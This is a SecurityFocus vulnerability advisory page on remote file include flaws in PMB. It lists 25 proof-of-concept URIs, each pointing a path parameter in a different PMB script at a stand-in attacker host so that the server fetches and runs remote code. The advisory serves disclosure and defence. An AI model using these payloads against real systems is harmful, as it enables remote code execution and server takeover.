Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PMB Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[PMB_path]/includes/resa_func.inc.php?class_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/bull_info.inc.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options/options_date_box.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options/options_file_box.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options/options_list.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options/options_query_list.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options/options_text.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options_empr/options.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options_empr/options_comment.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options_empr/options_date_box.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options_empr/options_list.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options_empr/options_query_list.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/includes/options_empr/options_text.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/admin/import/iimport_expl.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/admin/netbase/clean.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/admin/notices/perso.inc.php?class_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/admin/quotas/main.inc.php?class_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/admin/param/param_func.inc.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/admin/sauvegarde/lieux.inc.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/opac_css/rec_panier.php?base_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/opac_css/includes/author_see.inc.php?base_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/autorites.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/account.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/cart.php?include_path=http://www.example2.com/evil?
http://www.example.com/[PMB_path]/edit.php?include_path=http://www.example2.com/evil?







 

Privacy Statement
Copyright 2009, SecurityFocus